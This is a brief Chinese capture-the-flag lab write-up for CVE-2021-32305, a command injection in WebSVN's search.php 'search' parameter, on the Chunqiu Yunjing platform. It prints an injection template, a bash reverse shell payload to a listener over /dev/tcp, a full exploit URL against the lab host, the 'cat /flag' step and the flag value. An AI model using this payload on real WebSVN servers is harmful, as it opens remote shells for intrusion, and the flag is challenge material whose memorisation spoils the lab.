春秋云镜 CVE-2021-32305 WebSVN RCE
靶标介绍
WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。
启动场景
漏洞利用
EXP
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'
vps监听18888,
http://eci-2ze16snbrsm9pv66s1k3.cloudeci1.ichunqiu.com/search.php?search=“;/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/18888 0>&1;”
执行cat /flag
得到flag
flag{b35eebb3-3c19-4a0a-8dcc-f7a63cb39f9f}